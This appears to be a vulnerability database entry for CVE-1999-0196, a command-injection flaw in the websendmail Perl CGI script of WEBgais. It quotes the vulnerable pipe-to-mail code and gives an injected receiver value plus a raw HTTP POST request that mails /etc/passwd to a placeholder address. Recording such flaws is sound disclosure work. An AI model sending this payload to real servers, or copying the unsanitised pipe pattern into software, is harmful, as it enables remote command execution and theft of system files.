Brief description: websendmail is a cgi program written in perl, that fails to check user input from a form used to send e-mail.
Full description: websendmail comes with WEBgais, an interface to the GAIS search tool. It's a perl script used to send e-mail to a destination specified with user input via a form. Special characters are not removed from this user input before being used to send the email. Here is the code:
(...) $cmd="| $MAILBIN $VAR_receiver"; open (PIPEOUT, $cmd);The variable $VAR_receiver contains user input from the form. Suppose it contained:
';mail+xxx@yyy.zzz</etc/passwd;'This would cause /etc/passwd to be mailed to xxx@yyy.zzz.
Components: websendmail, version 1.0; trusted
Systems: any
Effect(s) of exploiting: The remote user can execute programs with the privileges of the web server.
Detecting the hole:
Fixing the hole:
Other information:
cgi mail perl input validation
PA Classification(s):
RISOS Classification(s):
DCS Classification(s):
CVE Number: CVE-1999-0196 -- The websendmail program in the Webgais program allows a remote user to access arbitrary files.
Attack:
telnet target.machine.com 80 POST /cgi-bin/websendmail HTTP/1.0 Content-length: xxx (should be replaced with the actual length of the string passed to the server, in this case xxx=90) receiver=;mail+me@here.earth</etc/passwd;&sender=a&rtnaddr=a&subject=a&content=a
Advisories: Security Focus has the Bugtraq message ; ISS X-Force database entry http-webgais-smail
Related Vulnerabilities:
Reporting: Razvan Dragomirescu, drazvan@kappa.ro in Bugtraq Message-ID: <Pine.LNX.3.95.970704113121.1475A-100000@pop3.kappa.ro> (Friday, July 4th, 1997 )